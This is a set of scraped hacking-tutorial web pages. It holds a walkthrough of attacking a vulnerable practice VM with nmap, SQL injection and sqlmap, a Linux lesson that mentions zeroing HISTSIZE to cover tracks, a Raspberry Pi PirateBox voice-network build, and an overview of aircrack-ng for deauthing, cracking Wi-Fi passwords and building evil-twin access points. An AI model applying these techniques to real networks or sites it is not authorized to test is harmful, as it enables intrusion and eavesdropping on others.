Pro:How to Remotely Record & Listen to the Microphone on Anyone's ComputerExclusive:Dual-Boot iOS 8 on Your Android Phone (4.0+)News:The OnePlus 7 Pro's GPS Is So Much Better Than Other Phones Thanks to This Unique FeatureExclusive:Dual-Boot Android on Your iPhone (iOS 7+)How To:Install an Off-the-Shelf Hard Drive in an Xbox 360 (Get 10x the GB for Your Money)Hack Like a Pro:How to Use Hacking Team's Adobe Flash ExploitHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 5 (Installing New Software)How to Hack Like a Pro:Hacking Windows Vista by Exploiting SMB2 VulnerabilitiesHack Like a Pro:How to Remotely Install an Auto-Reconnecting Persistent Back Door on Someone's PCHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)Hack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterHow To:Windows 7 Won't Boot? Here's How To Fix Your Master Boot RecordHow To:Run Windows from Inside LinuxNews:Complete Arch Linux Installation, Part 1: Install & Configure ArchHow To:Give Your GRand Unified Bootloader a Custom ThemeHow To:Restore Windows Master Boot Record on VistaNews:Backtrack 5 Security EssentialsNews:Virtualization Using KVMHow To:Remove a Windows Password with a Linux Live CD
How to Hack Hackademic.RTB1 Machine Part 1 Β« Null Byte :: WonderHowTo
Welcome hackers.Hackacademic.RTB1 is vulnerable machine for training our skills.This machine can be download from free fromhere. There is many tutorial how to hack these machine but i did always be my self.Step 1: Recognize Open PortsFirst step is recognize open ports in machine.We can use our favourite nmap scanner and just simply typenmap <IP of machine>I useT4option in mnap for just simple do faster scan :)As we can see there are just 1 open port and there is port 80.So we do some digging and start our browser and insert ip address of out machine.So our victim page looks like this one after some clicking and looking for url you can see some possibilities of SQL injection. After insert'at the end of url.We get error of SQL.Huray!! We immediately start our second most powerful programStep 2: SQL InjectionIn this section we just can start sqlmap program and check if our link is really vulnerable.So we simple runsqlmap.py -u "<url>" --dbsafter runnig couple more programs we are able to retrieve wordpress user.Sorry guys I don't want to show you all steps :) Just try to figure out how many other sqlmap you have to run to get all users and theirs passwords.When you check carefully tables of user we can see that open user has priority 10 which means that user is admin and have highest privileges in wordpress. We just simpe typeafter these we can simple login.Just insert into browser<ip +>HackademicRTB1/wp-admin/We should see login page for wordpress and just simple insert credentialSo I really want these make as one tutorial but for me it's too late and i heading to bed.Second part soon :) If you have any question ale any feedback please let me known :)Cheers SpyxWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Get a Free Drink from a Nesquik Vending MachineHow To:Hack a Vending Machine in 40 SecondsThe New Tattoo Trend:3D-Printers Inking SkinHack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPMac for Hackers:How to Get Your Mac Ready for HackingThe Clone Wars:The Russians Flirt with Instagram & Fake Follower Vending MachinesHow to Hack a Vending Machine:9 Tricks to Getting Free Drinks, Snacks, & MoneyHow To:Hack a Brother KH-930e knitting machine to receive any digital patternHow To:Hack a Soda Machine to Get a Drink and a RefundHow To:Hack TOR Hidden ServicesHow To:Build a MAME classic arcade machineHow To:Attack a Vulnerable Practice Computer: A Guide from Scan to ShellNews:After Error 53 Disaster, Apple Is Making It Much Easier to Fix Touch IDHow To:Hack Michigan's optical scanner voting machinesHow To:Use a reel-to-reel tape machineMac for Hackers:How to Install Kali Linux as a Virtual MachineHow To:Hack Coin-Operated Laudromat Machines for Free Wash & Dry CyclesNews:New Maintenance Videos!How To:Make a BB Machine Gun from a Soda BottleNews:Networking Virtual Machines Using VDEHow To:Remotely Control Computers Over VNC Securely with SSHHow To:Create a Redstone Sorting Machine in MinecraftHow To:Create a Piston Conveyor Belt in MinecraftHow To:Make a Soda MachineNews:Mindstorms Aircraft FactoryHow To:Wake Up to Bubbles by Making the World's Most Gentle Alarm ClockNews:Anonymity Networks. Don't use one, use all of them!Secure Your Computer, Part 3:Encrypt Your HDD/SSD to Prevent Data TheftNews:C-Based Virtual Machine for the DCPU-16News:Virtualization Using KVMNews:Tandemoro Drummer Beats the MachinesNews:Wayback machineHow To:Hack a toy slot machine
Hack Like a Pro: Linux Basics for the Aspiring Hacker, Part 9 (Managing Environmental Variables) Β« Null Byte :: WonderHowTo
Welcome back, my aspiring hackers!One of the areas that often gives Linux newcomers problems are the environment variables. Although Windows systems have environment variables, most users, and for that matter, most administrators, never manage their environment variables. To get the most from ourLinux hacking system, we need to both understand environment variables and be able to manage them for optimal performance.Environment variables are the variables that are used by our particular user environment. In most cases, this will be our BASH shell. Each user, including root, has a set of environment variables that are set at default values unless they're changed. We can change these values to make our system work more efficiently and tailor our work environment to best meet our individual needs.Step 1: View Our Environment VariablesWe can view our environment variables by typing:setNotice thatsetlists for us all of the environment variables, user defined functions, and aliases. Also, make note that our environment variables are always UPPER CASE names such asHOME,PATH,HISTSIZE, etc.If want to see the value inside the variable, we can type:echo $HISTSIZEIt's important to notice that when we want to use the value inside the variable, such as here, we need to put a$before the variable name.TheHISTSIZEvariable contains the value of the number of commands that are stored in our history file. As you can see in this screenshot, the HISTSIZE variable is set to 1000. In some cases, we may not want our commands stored in the history file, such aswhen we are covering our tracks, then we can set our HISTSIZE variable to zero.HISTSIZE=0When we change an environment variable, it's only for that environment. This means that once we close that terminal, any changes that we made to these variables is lost or set back to the default value. If we want the value to remain for our next terminal session and other terminal sessions, we need to export the variable. We can do this by simply typing:export HISTSIZEStep 2: Changing Our Terminal PromptLet's have a little fun and change the prompt in our terminal. The environment variable that contains our prompt for the first terminal isPS1. We can change it by typing:PS1= "World's Best Hacker: #"Remember that our prompt will now be "World's Best Hacker" whenever we open the first terminal (PS1), but the second terminal will still be the defaultBackTrackcommand prompt. In addition, if we really like this command prompt and want to keep it, we need to export it so that each time we open this terminal, the prompt will be "World's Best Hacker."export PS1Step 3: Changing Our Path VariableProbably the most important variable in our environment is ourPATHvariable. This is what controls where our shell looks for the commands we type, such ascd,ls,echo, etc. If it doesn't find the command in one of the directories in our path, it returns an error "command not found," even if it DOES exist in another directory not in our PATH.Let's take a look at our path variable:echo =$PATHNotice the directories included in our PATH. These are usually the various/binand/sbindirectories where our system variables are found. When we typels, the system knows to look in each of these directories for thelscommand.Whenever we want to useaircrack-ngor another hacking application in this PATH variable, we have to first navigate to that directory. In the case of aircrack-ng, that would be/pentest/wireless/aircrack-ng.Now, if we want to add ourwireless hackingapplication to our PATH variable, we can type:PATH=$PATH:/pentest/wireless/aircrack-ngNow when we want to run aircrack-ng, we don't need to navigate to thepentest/wireless/aircrack-ngdirectory. We now can execute aircrack-ng applications from anywhere in BackTrack!This can be a very useful technique for directories that we use often, but be careful to not add too many directories to your PATH variable as the system will have to search through every directory in the PATH to find commands and could potentially slow down your terminal and your hacking.That's It for Now...Stay tuned for more Linux basics for the aspiring hacker. If you haven't checked out the other guides yet, you can find them allright here. If you have any questions, make sure to comment below or start a thread in theNull Byte forumfor help.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCalm penguinandscreaming penguinphotos via ShutterstockRelatedNews:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 4 (Finding Files)How To:The Essential Skills to Becoming a Master HackerHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 22 (Samba)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 12 (Loadable Kernel Modules)Hack Like a Pro:Perl Scripting for the Aspiring Hacker, Part 1Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 2 (Keywords)How to Hack Like a Pro:Getting Started with MetasploitHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 13 (Mounting Drives & Devices)How To:Perl for the Aspiring Hacker - Part 1 - VariablesHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 2 (Creating Directories & Files)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 25 (Inetd, the Super Daemon)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 21 (GRUB Bootloader)Hack Like a Pro:Python Scripting for the Aspiring Hacker, Part 2Hack Like a Pro:Scripting for the Aspiring Hacker, Part 1 (BASH Basics)Hack Like a Pro:Python Scripting for the Aspiring Hacker, Part 1Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 17 (Client DNS)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 5 (Installing New Software)How To:Linux Basics for the Aspiring Hacker: Managing Hard DrivesHow To:Linux Basics for the Aspiring Hacker: Configuring ApacheGoodnight Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 1 - Legal Hacker TrainingScrabble Bingo of the Day:EURYOKYCommunity Byte:HackThisSite Walkthrough, Part 2 - Legal Hacker TrainingHack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterGoodnight Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker TrainingNews:Let Me Introduce MyselfCommunity Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingHow To:How Hackers Take Your Encrypted Passwords & Crack ThemNews:Complete Arch Linux Installation, Part 2: Graphical User Interface & Packages
Build an Off-Grid Wi-Fi Voice Communication System with Android & Raspberry Pi Β« Null Byte :: WonderHowTo
When you don't have a steady cellular signal or immediate Wi-Fi access but need to communicate with others around you, you can set up an off-the-grid voice communications network using aRaspberry Piand an Android app.There are apps such asBridgefythat will create a mesh network to communicate with other devices over Bluetooth. Still, when you're traveling in a convoy and want to message people in other vehicles, all the metal will make that nearly impossible. Even in situations where you're outside, but there are a lot of obstructions to block a Bluetooth signal, you're better off using something else.In cases where a hotspot router won't be powerful enough to connect everyone, a Raspberry Pi with a decent wireless network adapter can help. With that and a PirateBox server running on it, you'll be able to anonymously share images, videos, audio files, documents, voice communications, and other content, as long as everyone is connected to its Wi-Fi hotspot.Don't Miss:Do This Before Posting Protest Photos & Videos on Social MediaWith protests happening all over the world, law enforcement in some areas may try to disable cellular connections in the area to prevent demonstrators from talking with each other. The demonstrations in the US over police brutality and systemic racism are gripping the entire nation, and it's possible that mobile communications can be bogged down or blocked. Our wireless project here, a sort of Wi-Fi-based walkie-talkie system, can help with that, enabling everyone to alert each other of vital news, all connected to your Wi-Fi source.What You'll NeedRaspberry Pi 3:We're using one of these models because the newer Raspberry Pi 4 doesn't have a PirateBox image for it yet. However, any other Pi should work as long as you havea Wi-Fi donglefor them if they are not Wi-Fi capable. Specifically, we're using aRaspberry Pi 3 B+model.USB flash drive:A flash drive is needed to act as the hard drive for your PirateBox. The size will depend on how you use it, so the larger, the better. If there will be lots of photos and videos being used, try a1 TB external hard drive, and you'll never have to worry.MicroSD card:Make sure it's a 16 GB or more. We recommend at least 32 GB to play it safe.MicroSD card reader:There are tons of options out there, so any one will do.Power supply:This is needed for the Raspberry Pi unit.Ethernet cable:We use this to connect our Raspberry Pi to our router to set it all up. It won't be needed afterward.Wireless network adapterwitha high-gain antenna:If you want a stronger signal, which you most likely will, you'll need a good, sturdy, and rugged Wi-Fi adapter (theAlfa Tube-Uis a good choice) with a nice bigomnidirectional antennathat's made for outdoor use, such as for RVs and marine use. Make sure it works with Kali Linux so you can use it for other purposes when needed. Plus, doing so will almost guarantee it will work with PirateBox. Also, a Wi-Fi booster can help make sure you all stay connected. If you want to get fancy, you can get an adapter with apanel antennaand point it at your target, but having one you don't have to mess with, located in the middle of the communications zone (for instance, the middle car in a convoy or caravan), is ideal.Step 1: Set Up a PirateBoxPirateBox is a really cool tool that you can load onto a Raspberry Pi that acts as an offline communications box, where you can connect to the wireless network and use its chat, file server, and other features with nearby devices. What we're interested in for this project is the fact that it's based on an open-source router technology that should have all the switching that we need to communicate over voice.We won't cover the PirateBox setup here since we've already gone over it in detail in another guide, so make sure tocheck that outbefore continuing. Our Cyber Weapons Lab video for that is embedded below for your convenience. You'll basically load the PirateBox image on the Raspberry Pi, power it all up, and you should be able to connect to its Wi-Fi network where you can log in over SSH.Full Guide:Use a Raspberry Pi as a Dead Drop for Anonymous Offline Communicationso I recommend that you download then the Raspberry Pi 3 image here for the pirate box you'll go ahead and flash that onto the SD card of the Raspberry Pi and then once you power it up you should be able to connect to the Wi-Fi network that it makes and then log in over SSHStep 2: Connect to the PirateBoxTo find out what the IP address of your PirateBox Pi is, do anarp-scanfor it. Below, we can see that one of them is indeed a Raspberry Pi, most likely our PirateBox Pi, if there are no other Pis around.~$ arp-scan -l Interface: en0, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.77.1 b8:27:eb:4d:1f:f2 Raspberry Pi Foundation 192.168.77.128 b4:f1:da:ec:4c:e7 (Unknown) 516 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.5: 256 hosts scanned in 1.858 seconds (137.78 hosts/sec). 2 respondedNow, let's test it out to make sure that's it. Make sure to swap out your Pi's address with the one we have in the command below. Choose "yes" when asked to connect, then enter in your PirateBox Pi's password.~$ ssh [email protected] The authenticity of host '192.168.77.1 (192.168.77.1)' can't be established. ECDSA key fingerprint is SHA256xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx. Are you sure you want to continue connecting (yes/no)? yes Waarning: Permanently added '192.168.77.1' (ECDSA) to the list of known hosts. [email protected]'s password:When you see the PirateBox screen, you're golden.____________________.__ __ __________ \______ \______ \__|___________ _/ |_ ____\______ \ _______ ___ | _/| ___/ \_ __ \__ \\ __\/ __ \| | _// _ \ \/ / | | \| | | || | \// __ \| | \ ___/| | ( < > > < |____|_ /|____| |__||__| (____ /__| \___ >______ /\____/__/\_ \ \/ \/ \/ \/ \/ Website: http://piratebox.cc PirateBox Version: 1.1.4 Forum: http://forum/piratebox.cc Build date: 11-05-2018 IRC: #piratebox irc.freenode.net Be open -- Share freely! First Steps After Flashing 1. Change password of alarm user > passwd 2. Change password of root user > sudo password root 3. Enable Fake-Timeservice 3.1 Set date and time # Disable network time sync > sudo timedatectl set-ntp false # Set time to "Mon May 23 17:42:00" (Format: CCYYMMDD hhmm) > sudo date -s "20170523 1742" > cd /opt/piratebox && sudo ./bin/timesave.sh ./conf/piratebox.conf install 3.2 Enable on startup > sudo systemctl enable timesave 4. Enable the Kareha Image and Discussion Board > sudo /opt/piratebox/bin/board-autoconf.sh 5. Enable USB thumb drive share OR extend SDCard USB: > sudo /opt/piratebox/rpi/bin/usb_share.sh SDCard: > sudo /opt/piratebox/rpi/bin/sdcard_share.sh 6. Enable UPnP Media Server > sudo cp /etc/minidlna.conf /etc/minidlna.conf.bkp > sudo cp /opt/piratebox/src/linux.example.minidlna.conf /etc/minidlna.conf > sudo systemctl stsart minidlna > sudo systemctl enable minidlna 7. Enable RealTimeClock timekeeping (needs DS3231 or 1307 RTC module!) > sudo systemctl enable rpi_hwclock [alarm@alarmpi ~]$Step 3: Change the Wi-Fi Card (Optional)Now that we're in our PirateBox Pi, if you're using an external Wi-Fi adapter and not the internal one, we need to change one variable in the /boot/wifi_card.conf file to switch from its internal card to the network adapter we want to use instead. First, we need to find the card's name, so let's useifconfig.[alarm@alarmpi ~]$ ifconfigIf you only see one card, such as wlan1, then you'll need to do anip ascan instead, where you'll likely see wlan1 and wlan0, which is what I got.[alarm@alarmpi ~]$ ip aTo get the second card up and running, use the following, replacing the card's name with your own. Type in your password afterward. Then, if you go back up and use justifconfig, you should see both cards now.[alarm@alarmpi ~]$ sudo ifconfig wlan0 up [sudo] password for alarm:Now, open up that config file mentioned earlier in nano and make sure it says the name of the Wi-Fi adapter you're using. PressControl-Xon your keyboard to quit nano. If you changed the name, hitY, thenEnter, to save it.[alarm@alarmpi ~]$ sudo nano /boot/wifi_card.conf GNU nano 2.9.6 /boot/wifi_card.config wlan1So, now we have changed the Wi-Fi card that the Raspberry Pi is using. In our case, we're currently using the external card, but if you need to switch back, it's as easy as going back into the config file and changing it.Step 4: Install Intercom & Connect to PirateBoxNow, download and install the app we're using for our communications on all of the Android devices that will be talking with one another using the PirateBox Pi. That app is called "Intercom for Android."Play Store Link:Intercom for Android(free)With the app all ready, to test it, disconnect from your mobile data on your Android phone, then open up your Wi-Fi settings, find your PirateBox Pi, and connect to it. Your phone may warn you that there is no internet available, but we don't need it. When you connect to PirateBox, the PirateBox page should open right away, but we're not interested in the PirateBox interface right now.Step 5: Talk to Others on the Same Wi-Fi NetworkNow, open up Intercom for Android. You should see a list of devices that are connected to the PirateBox Pi. If not, touch the compass to see if that makes them appear. And if that doesn't work, you may need to connect to the other devices via Bluetooth at first, which seems to jog the app into recognizing them. Hopefully, that's not the case for most of you since it should be easy for anyone to connect without additional work.I can see a device, and if you tap the Wi-Fi icon, it should ping it so that it makes a noise to tell that you are connected and can communicate. To talk them, press-and-hold the "PTT" button and start talking. All connected devices should hear you if their apps are open too.Alternatively, you can tap the dot-within-a-circle icon up top to switch modes. Doing so will enable voice detection, so you won't have to keep pushing the "PTT" button. Just talk, and it will hear you and transmit the communications to others on the network. To switch back to push-to-talk, tap the comment box icon.After following our guide, you should be able to connect multiple Android phones together β€” even if there's no cellular network available. Pretty cool, right?There Are More Advanced Things You Can DoThere are some limitations to this project, but in general, if you want to dive even deeper, you can load up a Raspberry Pi withOpenWrt. It's a really cool open-source router firmware that will allow you to dig into the options and do all sorts of interesting things. However, it's a bit more complicated to set up, and the project above is more beginner-friendly.Don't Miss:Log into Your Raspberry Pi Using a USB-to-TTL Serial CableWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image bySadmin/Null Byte; Screenshots by Retia/Null ByteRelatedHow To:Enable Monitor Mode & Packet Injection on the Raspberry PiHow To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow To:Load Kali Linux on the Raspberry Pi 4 for the Ultimate Miniature Hacking StationHow To:Set Up a Headless Raspberry Pi Hacking Platform Running Kali LinuxHow To:Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+How To:Log into Your Raspberry Pi Using a USB-to-TTL Serial CableHow To:Build a Pumpkin Pi β€” The Rogue AP & MITM Framework That Fits in Your PocketHow To:Set Up Kali Linux on the New $10 Raspberry Pi Zero WHow To:Set Up Network Implants with a Cheap SBC (Single-Board Computer)Raspberry Pi Alternatives:10 Single-Board Computers Worthy of Hacking Projects Big & SmallHow To:Turn Any Phone into a Hacking Super Weapon with the SonicHow To:Discover & Attack Raspberry Pis Using Default Credentials with Rpi-hunterHow To:Lock Down Your DNS with a Pi-Hole to Avoid Trackers, Phishing Sites & MoreHow To:Automate Hacking on the Raspberry Pi with the USB Rubber DuckyHow To:Wardrive with the Kali Raspberry Pi to Map Wi-Fi DevicesOpen Sesame:Make Siri Open Your Garage Door via Raspberry PiNews:Google Now Gets Voice Toggles for Wi-Fi, Bluetooth, & FlashlightHow To:Enable Offline Chat Communications Over Wi-Fi with an ESP32How To:Hack Wi-Fi Networks with BettercapBuyer's Guide:Top 20 Hacker Holiday Gifts for Christmas 2017How to Hack Wi-Fi:Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking ToolsThe Hacks of Mr. Robot:How to Build a Hacking Raspberry PiHow To:Map Networks & Connect to Discovered Devices Using Your PhoneHow To:Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi DeautherHow To:Create a Wireless Spy Camera Using a Raspberry PiHow To:Boot Multiple Operating Systems on the Raspberry Pi with BerryBootHow To:Having Connection Issues on Android Pie? Turn Off 'Turn on Wi-Fi Automatically'How to Hack Wi-Fi:Breaking a WPS PIN to Get the Password with BullyHow To:Fully Control Your Galaxy S5 with Google Now Commandsβ€”No Root NeededHow To:Use VNC to Remotely Access Your Raspberry Pi from Other DevicesRaspberry Pi:Hacking PlatformRaspberry Pi:WiFi AnalyzerHow to Hack Wi-Fi:Selecting a Good Wi-Fi Hacking StrategyRickroll Warning:This Exploit Can Hijack Any Nearby ChromecastHow to Hack Wi-Fi:Cracking WPA2-PSK Passwords Using Aircrack-NgNews:Project Zero Finds iPhone & Android Open to Bugs in Broadcom's Wi-Fi ChipsNews:Smart Home Proof of Concept Uses a Raspberry Pi to Control Air Conditioner with HoloLensHow To:Pick an Antenna for Wi-Fi HackingNews:PSP2 (Next Generation Portable) or NGPNews:Art Meets Information Liberation with the Transparency Grenade
How to Hack Wi-Fi: Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking Tools Β« Null Byte :: WonderHowTo
Welcome back, my fledgling hackers!In the first part of my series onWi-Fi hacking, we discussed thebasic terms and technologiesassociated with Wi-Fi. Now that you have a firm grip on what Wi-Fi is exactly and how it works, we can start diving into more advance topics onhow to hack Wi-Fi.In this article, we'll take a look at the world's best Wi-Fi hacking software,aircrack-ng, which we previously used tobump your annoying neighbor off their own Wi-Fi network. We'll be using aircrack-ng in nearly all of the subsequent hacks, so I think it's wise to start with some basics on what is included and how to use everything.Need a wireless network adapter?Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2017For this to work, we'll need to use a compatible wireless network adapter. Check out our 2017 list of Kali Linux and Backtrack compatible wireless network adapters in the link above, or you can grabour most popular adapter for beginners here.Check out our post on picking the best adapter for Wi-Fi hacking!Image by SADMIN/Null ByteFirst of all, aircrack-ng is not a single tool, but rather a suite of tools for manipulating and cracking Wi-Fi networks. Within this suite, there is a tool calledaircrackfor cracking passwords, but to get to the cracking we need to do several steps using other tools. In addition, aircrack-ng is capable of doing DOS attacks as well rogue access points, caffe latte, evil twin, and many others.So, let's get started with the aircrack-ng suite!Quick NoteThengstands fornew generation, as aircrack-ng replaces an older suite calledaircrackthat is no longer supported.Step 1: IwconfigBefore we get started with aircrcak-ng, we need to make certain thatBackTrackrecognizesyour wireless adapter. We can do this within any Linux system by typing:bt > iwconfigWe can see here that BackTrack recognizes my USB wireless card, and it tells me that it's capable of 802.11bgn, that the ESSID is off, that the mode is managed, etc.Okay, now we're ready to start using aircrack-ng.Step 2: Airmon-NgThe first tool we will look at and need in nearly ever WiFi hack isairmon-ng, which converts our wireless card into a promiscuous mode wireless card. Yes, that means that our wireless card will hookup with anyone!Well, that's almost correct. When our network card is in promiscuous mode, it means that it can see and receive all network traffic. Generally, network cards will only receive packets intended for them (as determined by the MAC address of the NIC), but with airmon-ng, it will receive all wireless traffic intended for us or not.We can start this tool by typingairmon-ng, theaction(start/stop), and then theinterface(mon0):bt > airmon-ng start wlan1Airmon-ng responds with some key information on our wireless adapter including the chipset and driver. Most importantly, note that it has changed the designation for our wireless adapter from wlan1 to mon0.Step 3: Airodump-NgThe next tool in the aircrack-ng suite that we will need isairodump-ng, which enables us to capture packets of our specification. It's particularly useful in password cracking.We activate this tool by typing theairodump-ngcommand and therenamed monitor interface(mon0):bt >airodump-ng mon0As we can see in the screenshot above, airodump-ng displays all of the APs (access points) within range with their BSSID (MAC address), their power, the number of beacon frames, the number of data packets, the channel, the speed, the encryption method, the type of cipher used, the authentication method used, and finally, the ESSID.For our purposes of hacking WiFi, the most important fields will be the BSSID and the channel.Step 4: Aircrack-NgAircrack-ngis the primary application with the aircrack-ng suite, which is used for password cracking. It's capable of using statistical techniques to crack WEP and dictionary cracks for WPA and WPA2 after capturing the WPA handshake.Step 5: Aireplay-NgAireplay-ngis another powerful tool in our aircrack-ng arsenal, and it can be used to generate or accelerate traffic on the AP. This can be especially useful in attacks like a deauth attack that bumps everyone off the access point, WEP and WPA2 password attacks, as well as ARP injection and replay attacks.Aireplay-ng can obtain packets from two sources:A live stream of packets, orA pre-captured pcap fileThe pcap file is the standard file type associated with packet capture tools like libpcap and winpcap. If you've ever used Wireshark, you've most likely worked with pcap files.We can see in the screenshot above of the first half of the aireplay-ng help screen, that aireplay can filter by the BSSID of the access point, the MAC address of either source or destination, the minimum and maximum packet length, etc. If we scroll down the help screen, we can see some of the attack options using aireplay-ng:These include deauth, fake deauth, interactive, arpreplay (necessary for fast WEP cracking), chopchop (a form of statistical technique for WEP packet decrypting without cracking the password), fragment, caffe latte (attacking the client side), and others.These four tools in the aircrack-ng suite are our Wi-Fi hacking work horses. We'll use each of these in nearly every Wi-Fi hack. Some of our more hack-specific tools include airdecap-ng, airtun-ng, airolib-ng and airbase-ng. Let's take a brief look at each of these.Step 6: Airdecap-NgAirdecap-ngenables us to decrypt wireless traffic once we have cracked the key. In other words, once we have the key on the wireless access point, not only can we use the bandwidth on the access point, but with airdecap-ng we can decrypt everyone's traffic on the AP and watch everything they're doing (the key is used for both access and for encryption).Step 7: Airtun-NgAirtun-ngis a virtual tunnel interface creator. We can use airtun-ng to set up an IDS on the wireless traffic to detect malicious or other traffic on the wireless access point. So, if we're looking to get an alert of a particular type of traffic (see my tutorial oncreating a PRISM-like spy tool), we can use airtun-ng to set up a virtual tunnel that connects to an IDS like Snort to send us alerts.Step 8: Airolib-NgAirolib-ngstores or manages ESSID's (the name of the access point) and password lists that will help speed up WPA/WPA2 password cracking.Step 9: Airbase-NgAirbase-ngenables us to turn our laptop and wireless card into an AP. This can be especially useful when doing a rogue access point or evil twin attacks. Basically, airbase-ng allows us to attack the clients, rather than the AP, and encourages the clients to associate with us rather than the real AP.That's It for NowThese are the primary tools in the aircrack-ng suite that we'll be using as we explore Wi-F hacking. There are other tools, but these are the ones we'll be focusing on. If you're looking for a cheap, handy platform to get started working with aircrack, check out our Kali Linux Raspberry Pi build usingthe $35 Raspberry Pi.Aircrack-ng works great on the Kali Linux Raspberry Pi.Image by SADMIN/Null ByteGet Started Hacking Today:Set Up a Headless Raspberry Pi Hacking Platform Running Kali LinuxIn our next guide, we'll start our exploration of wireless hacking techniques with creating a evil twin access point, so make sure to keep coming back. If you have any questions, please comment below or start a discussion in theNull Byte forumand we'll try to help you out.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseAerial symbolandWireless routerphotos via ShutterstockRelatedHow To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow to Hack Wi-Fi:Choosing a Wireless Adapter for HackingHow to Hack Wi-Fi:Cracking WEP Passwords with Aircrack-NgHow to Hack Wi-Fi:Breaking a WPS PIN to Get the Password with BullyHack Like a Pro:How to Get Even with Your Annoying Neighbor by Bumping Them Off Their WiFi Network β€”UndetectedHow to Hack Wi-Fi:Hunting Down & Cracking WEP NetworksHow to Hack Wi-Fi:Cracking WPA2-PSK Passwords Using Aircrack-NgHow to Hack Wi-Fi:Selecting a Good Wi-Fi Hacking StrategyHow to Hack Wi-Fi:Getting Started with Terms & TechnologiesHow To:Hack 5 GHz Wi-Fi Networks with an Alfa Wi-Fi AdapterHow To:Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber DuckyHow To:Hack Your Neighbor with a Post-It Note, Part 1 (Performing Recon)How To:Hack Wi-Fi Networks with BettercapHow To:Spy on Network Relationships with Airgraph-NgHow to Hack Wi-Fi:DoSing a Wireless AP ContinuouslyHow to Hack Wi-Fi:Cracking WPA2-PSK Passwords with CowpattyHow To:Crack WPA & WPA2 Wi-Fi Passwords with PyritHow to Hack Wi-Fi:Creating an Evil Twin Wireless Access Point to Eavesdrop on DataHow To:Turn on Google Pixel's Wi-Fi Assistant to Get Secure Access on Open NetworksHow To:Check if Your Wireless Network Adapter Supports Monitor Mode & Packet InjectionHow To:Automate Wi-Fi Hacking with Wifite2How to Hack Wi-Fi:Disabling Security Cameras on Any Wireless Network with Aireplay-NgAndroid Basics:How to Connect to a Wi-Fi NetworkHow To:Identify Antivirus Software Installed on a Target's Windows 10 PCHow To:Hack Open Hotel, Airplane & Coffee Shop Wi-Fi with MAC Address SpoofingNews:Project Zero Finds iPhone & Android Open to Bugs in Broadcom's Wi-Fi ChipsHow To:Hunt Down Wi-Fi Devices with a Directional AntennaHow To:The Beginner's Guide to Defending Against Wi-Fi HackingHow To:This Widget Lets You Open Wi-Fi Settings Faster, Share Passwords & More on Your iPhoneHow To:Hack WiFi Passwords for Free Wireless Internet on Your PS3How to Hack Wi-Fi:Creating an Invisible Rogue Access Point to Siphon Off Data UndetectedHow To:Crack Wi-Fi 